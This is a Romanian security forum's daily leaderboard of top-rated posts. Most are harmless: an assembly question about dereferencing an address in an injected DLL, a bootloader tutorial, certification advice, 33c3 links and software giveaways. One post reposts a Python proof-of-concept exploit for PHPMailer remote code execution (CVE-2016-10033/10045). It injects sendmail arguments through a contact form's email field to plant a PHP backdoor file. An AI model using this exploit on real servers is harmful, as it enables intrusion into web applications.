Leaderboard
Popular Content
Showing content with the highest reputation on 12/28/16 in all areas
-
nu e vinovat, el doar optimizeaza codul MrGrj zice: project properties -> build -> "optimize code" sau, daca tii neaparat, editezi fisierul executabil cu ollydbg si pui acolo mov edx, dword ptr[0x8CCE6C] in loc de: mov edx, plm.exe+4CCE6C3 points
-
An independent research uncovered a critical vulnerability in PHPMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the PHPMailer class. The first patch of the vulnerability CVE-2016-10033 was incomplete. This advisory demonstrates the bypass of the patch. """ usage = """ Usage: Full Advisory: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.txt PoC Video: https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html Disclaimer: For testing purposes only. Do no harm. """ import time import urllib import urllib2 import socket import sys RW_DIR = "/var/www/html/uploads" url = 'http://VictimWebServer/contact_form.php' # Set destination URL here # Choose/uncomment one of the payloads: # PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) #payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR # Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR ###################################### # PHP code to be saved into the backdoor php file on the target in RW_DIR RCE_PHP_CODE = "<?php phpinfo(); ?>" post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE} # Attack data = urllib.urlencode(post_fields) req = urllib2.Request(url, data) response = urllib2.urlopen(req) the_page = response.read() Mai multe informatii, aici3 points
-
Salutare! Lucrez la un programel si m-am lovit de o problema de care nu pot sa ii dau de cap si ma gandeam ca as putea primi o mana de ajutor de aici. Am un executabil fara cod sursa care la un moment dat executa opcode: mov edx,[plm.exe+4CCE6C] Ce vreau eu sa fac este sa reproduc instructiunea asta intr-un dll pe care il incarc in executabilul mai sus mentionat. Cunostintele mele (care sunt sub nivelul marii) in materie de ASM m-au ajutat sa rescriu niste bucatele din memoria executabilului astfel incat sa faca jmp la mine in dll intr-o functie naked, dar mai departe trebuie sa scriu la mine in functi acel opcode si chiar nu am idee cum. Base address e constanta, asa ca stiu care este adresa finala (0x400000+0x4CCE6C = 0x8CCE6C) Am incercat: // varianta 1: __asm { mov edx, [0x8CCE6C] } // varianta 2: __asm { mov edx, dword ptr[0x8CCE6C] } Dar cand am verificat codul in debugger, compilerul a eliminat dereferentierea(cred ca asa se numesc acele paranteze patrate din jurul adresei), iar instructiunea finala arata asa in ambele cazuri: mov edx, plm.exe+4CCE6C Daca se poate, imi puteti explica ce fac eu gresit? ------------------------------ // EDIT: Am reusit sa fac o smecherie, si anume dau push la eax pe stack, scriu in eax adresa, fac acea mutare si apoi dau pop la eax de pe stack: __asm { push eax mov eax, 0x8CCE6C mov edx, [eax] pop eax } Totusi, ce e gresit in primele mele 2 exemple si nu este nicio metoda sa execut acea instructiune fara sa folosesc un register in plus?2 points
-
It might be from being stuck at home with nothing to do over break, or it might be from an actual interest in low-level systems design, but I've taken it upon myself to learn more about OS implementation, starting with the bootloader. So, here we go. All of this information exists in various other places on the web, but there's no better way to learn than by teaching, right? Either way, this piece should serve as primer on what exactly a bootloader does and how to implement a relatively simple one (compared to a beast like GRUB which is ostensibly its own little operating system). Intregul tutorial2 points
-
Au ceva ghiduri pe acolo. Cel mai bine inveti singur si dai testele. Unele sunt gratis altele sunt cu bani (sume simbolice). Certificatele le trimite oriunde din cate stiu contra sumei de 15 dolari1 point
-
Are dreptate @CrazyTank. Examenele se dau la centrele VUE, costa 150 euro, poti da oricand. Daca poti sa astepti pana la anul, te inscrii la Poli, la LPIC si dai examen cu 50 de euro, dar e o data fixa, se da de 2 ori pe an parca. Vezi aici: http://www.lpic.ro/wiki/ si https://learn.ccna.ro/ Nu-ti recomand sa te duci la cursuri, invata singur. Cel putin la Poli, cursurile sunt tinute de niste studentasi de la Automatica si Calculatoare, membri ai ROSEdu. Certificarile sunt recunoscute international, valabile pe 5 ani. Adica iei LPIC-101, o sa fie valabila 5 ani, apoi te pregatesti pt LPIC-102 si o iei pe asta, o sa fie valabila alti 5 ani... O sa va pun la dispozitie, cursuri etc, dupa vacanta, scrieti-mi in privat sa nu uit. Numai bine!1 point
-
Afiseaza listing pe localbitcoins.com caci momentan nu schimba nimeni PSC - BTC pe Romania. Ai piata de desfacere mai mare si serviciu de escrow, sistem reputatie, etc. Ce-i drept ai si competitie pe alte tari unde altii cumpara la 25%-35%.1 point
-
Sper că e troll1 point
-
Salut. In general China = proasta calitate, ieftin = prost.1 point
-
Live: https://streaming.media.ccc.de/33c3 Schedule: https://fahrplan.events.ccc.de/congress/2016/Fahrplan/schedule.html Videos: https://media.ccc.de/c/33c31 point
-
WonderFox impreuna cu inca 15+ dezvoltatori software de renume oferindu-ne un mega cadou in valoare de 1000 de dolari. Prima runda (valabil înainte de 27 decembrie) - IObit Driver Booster 4 PRO - Ashampoo Home Designer Pro 3 - Ad-Aware Antivirus Pro - Heimdal Pro 6-Month - MailWasher Pro - Process Lasso Pro - HD Video Converter Factory Pro - DVD Video Converter - Watermark Software Runda a doua (28 decembrie - 07 ianuarie 2017) Sticky Password, EaseUs, MiniTool, Adguard, Epubor, Zemana, etc... Pagina promotionala o gasim aici: http://www.videoconverterfactory.com/christmas/ tot ce trebuie sa facem este sa alegem programul dorit si sa descarcam arhiva, in interiorul acesteia vom gasi kit-ul de instalare plus serialul pentru inregitrarea programului. Promotie valabila pana la data de 07 ianuarie 2017.1 point
-
https://www.stickypassword.com/lp/giveawayclub2016 bagati un mail aleator si primiti licenta premium pentru 1 an, foarte bun programul pentru gestionarea parolelor de la diferite conturi. Sticky Password Premium ( 1 user / 1 year )1 point
-
STATUS1 point
-
Vand site jackpot CSGO -Domeniu valabil 1 an -VPS de la digitalocean valabil pe inca 2 luni -Bot Functional -Script jackpot fara buguri -Va pot invata niste smecheri pe site Va ofer FULL acces la site, pentru link de la site PM sau contact skype: leviberlin2 PRET: 30$ URGENT-1 points
